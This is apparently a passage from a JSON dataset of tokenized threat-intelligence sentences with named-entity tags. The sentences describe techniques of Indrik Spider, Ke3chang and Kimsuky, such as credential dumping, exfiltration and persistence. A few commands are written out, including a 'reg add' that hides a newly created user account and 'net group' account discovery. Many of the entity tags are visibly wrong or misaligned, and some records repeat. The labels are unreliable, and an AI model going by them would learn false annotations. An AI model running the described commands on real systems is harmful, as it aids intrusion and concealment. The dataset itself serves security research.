- "has", - "attempted", - "to", - "get", - "users", - "to", - "click", - "on", - "a", - "malicious", - "zipped", - "file." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "developed", - "malware", - "for", - "their", - "operations,", - "including", - "ransomware", - "such", - "as", - "BitPaymer", - "and", - "WastedLocker." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "used", - "fake", - "updates", - "for", - "FlashPlayer", - "plugin", - "and", - "Google", - "Chrome", - "as", - "initial", - "infection", - "vectors." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "used", - "PowerShell", - "Empire", - "for", - "execution", - "of", - "malware." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "used", - "PowerView", - "to", - "enumerate", - "all", - "Windows", - "Server,", - "Windows", - "Server", - "2003,", - "and", - "Windows", - "7", - "instances", - "in", - "the", - "Active", - "Directory", - "database." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "served", - "fake", - "updates", - "via", - "legitimate", - "websites", - "that", - "have", - "been", - "compromised." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "used", - "PsExec", - "to", - "stop", - "services", - "prior", - "to", - "the", - "execution", - "of", - "ransomware." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "used", - "the", - "win32_service", - "WMI", - "class", - "to", - "retrieve", - "a", - "list", - "of", - "services", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "used", - "batch", - "scripts", - "on", - "victim's", - "machines." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Indrik", - "Spider", - "has", - "used", - "WMIC", - "to", - "execute", - "commands", - "on", - "remote", - "computers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Ke3chang", - "group", - "has", - "been", - "known", - "to", - "compress", - "data", - "before", - "exfiltration." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "is", - "known", - "to", - "use", - "7Zip", - "and", - "RAR", - "with", - "passwords", - "to", - "encrypt", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "performed", - "frequent", - "and", - "scheduled", - "data", - "collection", - "from", - "victim", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "performed", - "frequent", - "and", - "scheduled", - "data", - "exfiltration", - "from", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "compromised", - "credentials", - "to", - "sign", - "into", - "victims’", - "Microsoft", - "365", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malware", - "used", - "by", - "Ke3chang", - "can", - "run", - "commands", - "on", - "the", - "command-line", - "interface." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "malware", - "RoyalDNS", - "has", - "used", - "DNS", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "gathered", - "information", - "and", - "files", - "from", - "local", - "directories", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "deobfuscated", - "Base64-encoded", - "shellcode", - "strings", - "prior", - "to", - "loading", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "performs", - "account", - "discovery", - "using", - "commands", - "such", - "as", - "<code>net", - "localgroup", - "administrators</code>", - "and", - "<code>net", - "group", - "\"REDACTED\"", - "/domain</code>", - "on", - "specific", - "permissions", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "performs", - "discovery", - "of", - "permission", - "groups", - "<code>net", - "group", - "/domain</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "transferred", - "compressed", - "and", - "encrypted", - "RAR", - "files", - "containing", - "exfiltration", - "through", - "the", - "established", - "backdoor", - "command", - "and", - "control", - "channel", - "during", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "compromised", - "networks", - "by", - "exploiting", - "Internet-facing", - "applications,", - "including", - "vulnerable", - "Microsoft", - "Exchange", - "and", - "SharePoint", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "gained", - "access", - "through", - "VPNs", - "including", - "with", - "compromised", - "accounts", - "and", - "stolen", - "VPN", - "certificates." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "uses", - "command-line", - "interaction", - "to", - "search", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "Mimikatz", - "to", - "generate", - "Kerberos", - "golden", - "tickets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "tools", - "to", - "download", - "files", - "to", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "keyloggers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "dumped", - "credentials,", - "including", - "by", - "using", - "gsecdump." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "dumped", - "credentials,", - "including", - "by", - "using", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ke3chang", - "performs", - "account", - "discovery", - "using", - "commands", - "such", - "as", - "<code>net", - "localgroup", - "administrators</code>", - "and", - "<code>net", - "group", - "\"REDACTED\"", - "/domain</code>", - "on", - "specific", - "permissions", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "developed", - "custom", - "malware", - "that", - "allowed", - "them", - "to", - "maintain", - "persistence", - "on", - "victim", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "dropped", - "their", - "malware", - "into", - "legitimate", - "installed", - "software", - "paths", - "including:", - "`C:\\ProgramFiles\\Realtek\\Audio\\HDA\\AERTSr.exe`,", - "`C:\\Program", - "Files", - "(x86)\\Foxit", - "Software\\Foxit", - "Reader\\FoxitRdr64.exe`,", - "`C:\\Program", - "Files", - "(x86)\\Adobe\\Flash", - "Player\\AddIns\\airappinstaller\\airappinstall.exe`,", - "and", - "`C:\\Program", - "Files", - "(x86)\\Adobe\\Acrobat", - "Reader", - "DC\\Reader\\AcroRd64.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "NTDSDump", - "and", - "other", - "password", - "dumping", - "tools", - "to", - "gather", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "Base64-encoded", - "shellcode", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "performs", - "process", - "discovery", - "using", - "<code>tasklist</code>", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Several", - "Ke3chang", - "backdoors", - "achieved", - "persistence", - "by", - "adding", - "a", - "Run", - "key." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "compromised", - "credentials", - "and", - "a", - ".NET", - "tool", - "to", - "dump", - "data", - "from", - "Microsoft", - "Exchange", - "mailboxes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "network", - "scanning", - "and", - "enumeration", - "tools,", - "including", - "Ping." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "the", - "right-to-left", - "override", - "character", - "in", - "spearphishing", - "attachment", - "names", - "to", - "trick", - "targets", - "into", - "executing", - ".scr", - "and", - ".exe", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "actors", - "have", - "been", - "known", - "to", - "copy", - "files", - "to", - "the", - "network", - "shares", - "of", - "other", - "computers", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "dumped", - "credentials,", - "including", - "by", - "using", - "gsecdump." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "a", - "tool", - "known", - "as", - "RemoteExec", - "(similar", - "to", - "PsExec)", - "to", - "remotely", - "execute", - "batch", - "scripts", - "and", - "binaries." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "used", - "a", - "SharePoint", - "enumeration", - "and", - "data", - "dumping", - "tool", - "known", - "as", - "spwebmember." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ke3chang", - "performs", - "operating", - "system", - "information", - "discovery", - "using", - "<code>systeminfo</code>", - "and", - "has", - "used", - "implants", - "to", - "identify", - "the", - "system", - "language", - "and", - "computer", - "name." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "implants", - "to", - "collect", - "the", - "system", - "language", - "ID", - "of", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "performed", - "local", - "network", - "configuration", - "discovery", - "using", - "<code>ipconfig</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "performs", - "local", - "network", - "connection", - "discovery", - "using", - "<code>netstat</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "implants", - "capable", - "of", - "collecting", - "the", - "signed-in", - "username." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "performs", - "service", - "discovery", - "using", - "<code>net", - "start</code>", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "credential", - "dumpers", - "or", - "stealers", - "to", - "obtain", - "legitimate", - "credentials,", - "which", - "they", - "used", - "to", - "gain", - "access", - "to", - "victim", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "malware", - "including", - "RoyalCli", - "and", - "BS2005", - "have", - "communicated", - "over", - "HTTP", - "with", - "the", - "C2", - "server", - "through", - "Internet", - "Explorer", - "(IE)", - "by", - "using", - "the", - "COM", - "interface", - "IWebBrowser2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "has", - "used", - "batch", - "scripts", - "in", - "its", - "malware", - "to", - "install", - "persistence", - "mechanisms." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ke3chang", - "backdoor", - "RoyalDNS", - "established", - "persistence", - "through", - "adding", - "a", - "service", - "called", - "<code>Nwsapagent</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "added", - "accounts", - "to", - "specific", - "groups", - "with", - "<code>net", - "localgroup</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "modified", - "versions", - "of", - "PHProxy", - "to", - "examine", - "web", - "traffic", - "between", - "the", - "victim", - "and", - "the", - "accessed", - "website." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "RC4", - "encryption", - "before", - "exfil." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "QuickZip", - "to", - "archive", - "stolen", - "files", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "Blogspot", - "pages", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "Google", - "Chrome", - "browser", - "extensions", - "to", - "infect", - "victims", - "and", - "to", - "steal", - "passwords", - "and", - "cookies." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "a", - "HWP", - "document", - "stealer", - "module", - "which", - "changes", - "the", - "default", - "program", - "association", - "in", - "the", - "registry", - "to", - "open", - "HWP", - "documents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "signed", - "files", - "with", - "the", - "name", - "EGIS", - "CO,.", - "Ltd.." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "tools", - "that", - "are", - "capable", - "of", - "obtaining", - "credentials", - "from", - "saved", - "mail." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "browser", - "extensions", - "including", - "Google", - "Chrome", - "to", - "steal", - "passwords", - "and", - "cookies", - "from", - "browsers.", - "Kimsuky", - "has", - "also", - "used", - "Nirsoft's", - "WebBrowserPassView", - "tool", - "to", - "dump", - "the", - "passwords", - "obtained", - "from", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Org", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "collected", - "Office,", - "PDF,", - "and", - "HWP", - "documents", - "from", - "its", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "decoded", - "malicious", - "VBScripts", - "using", - "Base64." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "created", - "and", - "used", - "a", - "mailing", - "toolkit", - "to", - "use", - "in", - "spearphishing", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "been", - "observed", - "disabling", - "the", - "system", - "firewall." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "been", - "observed", - "turning", - "off", - "Windows", - "Security", - "Center", - "and", - "can", - "hide", - "the", - "AV", - "software", - "window", - "from", - "the", - "view", - "of", - "the", - "infected", - "user." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "registered", - "domains", - "to", - "spoof", - "targeted", - "organizations", - "and", - "trusted", - "third", - "parties." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "compromised", - "legitimate", - "sites", - "and", - "used", - "them", - "to", - "distribute", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "compromised", - "email", - "accounts", - "to", - "send", - "spearphishing", - "e-mails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "created", - "email", - "accounts", - "for", - "phishing", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "collected", - "valid", - "email", - "addresses", - "that", - "were", - "subsequently", - "used", - "in", - "spearphishing", - "campaigns." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "set", - "auto-forward", - "rules", - "on", - "victim's", - "e-mail", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "collected", - "victim", - "employee", - "name", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "exfiltrated", - "data", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "exfiltrated", - "stolen", - "files", - "and", - "data", - "to", - "actor-controlled", - "Blogspot", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "exploited", - "various", - "vulnerabilities", - "for", - "initial", - "access,", - "including", - "Microsoft", - "Exchange", - "vulnerability", - "CVE-2020-0688." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "obtained", - "exploit", - "code", - "for", - "various", - "CVEs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "RDP", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "deleted", - "the", - "exfiltrated", - "data", - "on", - "disk", - "after", - "transmission.", - "Kimsuky", - "has", - "also", - "used", - "an", - "instrumentor", - "script", - "to", - "terminate", - "browser", - "processes", - "running", - "on", - "an", - "infected", - "system", - "and", - "then", - "delete", - "the", - "cookie", - "files", - "on", - "disk." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "FTP", - "to", - "download", - "additional", - "malware", - "to", - "the", - "target", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "the", - "ability", - "to", - "enumerate", - "all", - "files", - "and", - "directories", - "on", - "an", - "infected", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "collected", - "victim", - "organization", - "information", - "including", - "but", - "not", - "limited", - "to", - "organization", - "hierarchy,", - "functions,", - "press", - "releases,", - "and", - "others." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "run", - "<code>reg", - "add", - "‘HKLM\\SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList’", - "/v</code>", - "to", - "hide", - "a", - "newly", - "created", - "user." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "an", - "information", - "gathering", - "module", - "that", - "will", - "hide", - "an", - "AV", - "software", - "window", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "downloaded", - "additional", - "scripts,", - "tools,", - "and", - "malware", - "onto", - "victim", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "sent", - "internal", - "spearphishing", - "emails", - "for", - "lateral", - "movement", - "after", - "stealing", - "victim", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "JScript", - "for", - "logging", - "and", - "downloading", - "additional", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "used", - "a", - "PowerShell-based", - "keylogger", - "as", - "well", - "as", - "a", - "tool", - "called", - "MECHANICAL", - "to", - "log", - "keystrokes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "gathered", - "credentials", - "using", - "Mimikatz", - "and", - "ProcDump." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Kimsuky", - "has", - "created", - "accounts", - "with", - "<code>net", - "user</code>." - ], - "ner_tags": [ - 